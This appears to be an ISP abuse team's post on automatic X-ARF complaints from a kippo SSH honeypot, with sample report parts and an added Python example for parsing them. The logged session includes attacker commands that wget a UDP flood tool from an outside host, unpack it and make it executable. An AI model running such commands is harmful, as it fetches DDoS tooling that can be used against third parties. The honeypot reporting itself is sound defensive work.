sshd complaints – update

The automatic complaint mechanism is now active. An X-ARF complaint is generated
for each session in which a successful login to the kippo honeypot produced
recorded commands. The address the complaint is sent to is determined as
always: check our own database, check the RIPE website and check Abusix.
Here is an example of the second MIME part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"


Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

The third MIME part looks like this:


MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
--===============0648269240==--
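
On the receiving side, an abuse desk can process this layout mechanically. The following is an added example, not code from this post or from the reporting tool: it assumes the part names report.yaml and command.txt shown above, treats the fields in the example as required, and uses constructed sample values throughout.

```python
import ipaddress
from email import message_from_string, policy
from email.message import EmailMessage

# Field names taken from the report.yaml part shown above.
REQUIRED = ("Reported-From", "Category", "Report-Type", "Report-ID", "Date",
            "Service", "Port", "Source", "Source-Type", "Schema-URL", "Version")

# Constructed sample values (documentation address and domain, not real data).
SAMPLE_FIELDS = {
    "Reported-From": "honeypot@example.org", "Category": "abuse",
    "Report-Type": "login-attack", "Report-ID": "0123456789abcdef@example.org",
    "Date": "2012-03-14 03:45:28", "Service": "sshd", "Port": "22",
    "Source": "192.0.2.10", "Source-Type": "ipv4", "Attachment": "text/plain",
    "Schema-URL": "http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json",
    "Version": "1.0.1",
}

def build_sample(fields, commands):
    """Build a constructed three-part message laid out like the parts above."""
    msg = EmailMessage()
    msg["Subject"] = "constructed sample complaint"
    msg.set_content("Human-readable summary (constructed).\n")
    report = "".join(f"{k}: {v}\n" for k, v in fields.items())
    msg.add_attachment(report, filename="report.yaml")
    log = "recorded commands during this session:\n\n" + "\n".join(commands) + "\n"
    msg.add_attachment(log, filename="command.txt")
    return msg.as_string()

def parse_complaint(raw):
    """Return (fields, commands, problems) for a raw complaint e-mail."""
    msg = message_from_string(raw, policy=policy.default)
    # get_filename() reads Content-Disposition filename or Content-Type name.
    parts = {p.get_filename(): p.get_content() for p in msg.walk() if p.get_filename()}
    fields = {}
    for line in parts.get("report.yaml", "").splitlines():
        key, sep, value = line.partition(":")  # split on the first colon only
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    body = parts.get("command.txt", "").splitlines()[1:]  # skip the heading line
    commands = [c for c in body if c.strip()]
    problems = [f"missing {k}" for k in REQUIRED if not fields.get(k)]
    if fields.get("Source-Type") == "ipv4":
        try:
            ipaddress.IPv4Address(fields.get("Source", ""))
        except ValueError:
            problems.append("Source is not a valid ipv4 address")
    return fields, commands, problems
```

A Source value obfuscated the way it is in this post would be reported under problems, since the receiver cannot map it to a customer.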
